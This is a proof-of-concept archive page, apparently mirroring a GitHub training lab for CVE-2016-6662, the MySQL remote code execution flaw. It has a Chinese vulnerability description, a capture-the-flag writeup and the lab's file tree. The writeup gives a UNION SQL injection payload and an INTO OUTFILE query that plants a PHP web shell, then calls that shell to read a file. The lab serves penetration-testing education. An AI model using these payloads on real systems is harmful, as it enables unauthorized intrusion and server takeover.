Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-6662 PoC — Oracle MySQL 远程代码执行漏洞/提权漏洞

Source
https://github.com/LSQUARE14/SQL_to_RCE_Lab
Associated Vulnerability
Title:Oracle MySQL 远程代码执行漏洞/提权漏洞 (CVE-2016-6662)
Description:Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。该数据库系统具有性能高、成本低、可靠性好等特点。 Oracle MySQL中的配置文件(my.cnf)存在远程代码执行漏洞。攻击者(本地或远程)可通过授权访问MySQL数据库(网络连接或类似phpMyAdmin的Web接口)或SQL注入方式,利用该漏洞向配置文件中注入恶意的数据库配置,导致以root权限执行任意代码,完全控制受影响的服务器。以下版本受到影响:Oracle MySQL 5.5.52及之前的版本,5.6.x
Description
This lab dedicated to learning penetration testing skill with CVE-2016-6662: MySQL Remote Root Code Execution
Readme
## About this lab

This lab is dedicated for learning penetration testing skill through *CVE-2016-6662: MySQL Remote Root Code Execution*

### Core logic:
The problem with this CVE lies in the secure_file_priv variable, which was added in MySQL version 5.5.53.
It was supposed to add a layer of security since it restricted the privilege to read or write anywhere, which happened a lot back then.
However, in the early stages of version 5.6 up to version 5.7.6, the default value of secure_file_priv is null, so nothing is changed if the database admin doesn't take extra notice at that point.


### Writeup:
1. The first part of the flag is inside the database, you will get it with this payload: `1 UNION SELECT NULL, flag from flags`
2. The second part of the flag is located at the root folder of the server. You first create a PHP shell code with this:
```
select '<?php $output=shell_exec($_GET["cmd"]);
echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
```
This create a PHP file with cmd parameter that take value from input and parse it to shell_exec() function - a PHP function that executing shell command.

3. With that parameter, you will get: `/shell.php?cmd=cat /flag.txt`.

4. You get the flag.
File Snapshot

 [4.0K]  /data/pocs/7fb39e7a83f8a7c127d59b1d836b9b8e3430020d
├── [4.0K]  db
│   ├── [ 187]  Dockerfile
│   └── [1.0K]  dump.sql
├── [ 777]  docker-compose.yaml
├── [ 108]  Dockerfile
├── [  63]  flag.txt
├── [1.2K]  README.md
└── [4.0K]  src
    ├── [1.1K]  ajax.php
    ├── [4.0K]  css
    │   ├── [103K]  bootstrap.min.css
    │   ├── [6.8K]  magnific-popup.css
    │   └── [4.7K]  templatemo-style.css
    ├── [4.0K]  img
    │   ├── [280K]  neaty-01.jpg
    │   ├── [124K]  neaty-02.jpg
    │   ├── [118K]  neaty-03.jpg
    │   ├── [ 89K]  neaty-04.jpg
    │   ├── [ 72K]  neaty-05.jpg
    │   ├── [184K]  neaty-06.jpg
    │   ├── [109K]  neaty-07.jpg
    │   ├── [ 80K]  neaty-08.jpg
    │   ├── [123K]  neaty-09.jpg
    │   ├── [ 95K]  neaty-10.jpg
    │   ├── [178K]  neaty-11.jpg
    │   ├── [173K]  neaty-12.jpg
    │   ├── [140K]  neaty-13.jpg
    │   ├── [129K]  neaty-14.jpg
    │   └── [4.2K]  tm-neaty-logo.png
    ├── [ 15K]  index.html
    └── [4.0K]  js
        ├── [ 94K]  jquery-1.11.3.min.js
        ├── [ 20K]  jquery.magnific-popup.min.js
        ├── [2.5K]  jquery.singlePageNav.min.js
        └── [2.0K]  main.js

5 directories, 30 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.